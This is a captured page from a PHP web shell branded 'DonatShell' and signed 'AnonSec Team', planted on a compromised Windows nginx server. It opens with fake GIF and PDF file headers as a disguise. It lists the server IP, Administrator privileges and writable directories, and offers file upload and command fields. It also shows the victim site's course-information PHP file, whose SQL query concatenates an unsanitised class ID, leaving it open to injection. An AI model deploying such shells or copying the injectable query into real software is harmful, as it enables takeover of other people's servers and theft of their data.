GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Class/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Class/CourseInfo.phpinc
<?
// Class/CourseInfo.phpinc
// Get course information from f_classId.

if (da()) debugTrackBegin();

$query = "
    SELECT course.userId,
		       course.courseId,
		       course.courseNumber,
           course.courseTitle
      FROM `class`
INNER JOIN `course` ON course.courseId = class.courseId
     WHERE class.classId IN (".$f_classId.")
";
$courseResult = query_do($query);
$courseResultCount = $_SESSION['qry']['count'];
if ( $courseResultCount ) {
	mysqli_data_seek($courseResult, 0);
	$courseRow = mysqli_fetch_assoc($courseResult);
	$f_courseId = $courseRow['courseId'];
	$f_course = $courseRow['courseNumber'];
	$f_courseTitle = $courseRow['courseTitle'];
	$InstructorPath = str_replace(" ","",userName($courseRow['userId']));
	if (false && dc()) {
		printVar('$f_courseId',$f_courseId);
		printVar('$f_course',$f_course);
		printVar('$f_courseTitle',$f_courseTitle);
		printVar('$InstructorPath',$InstructorPath);
		printVar('$courseRow',$courseRow);
	}
} else {
	$f_messageError = "Course not found for class (.$f_classId).";
	include('common/programmingError.phpinc');
}

if (da()) debugTrackEnd();
?>

Anon7 - 2022
AnonSec Team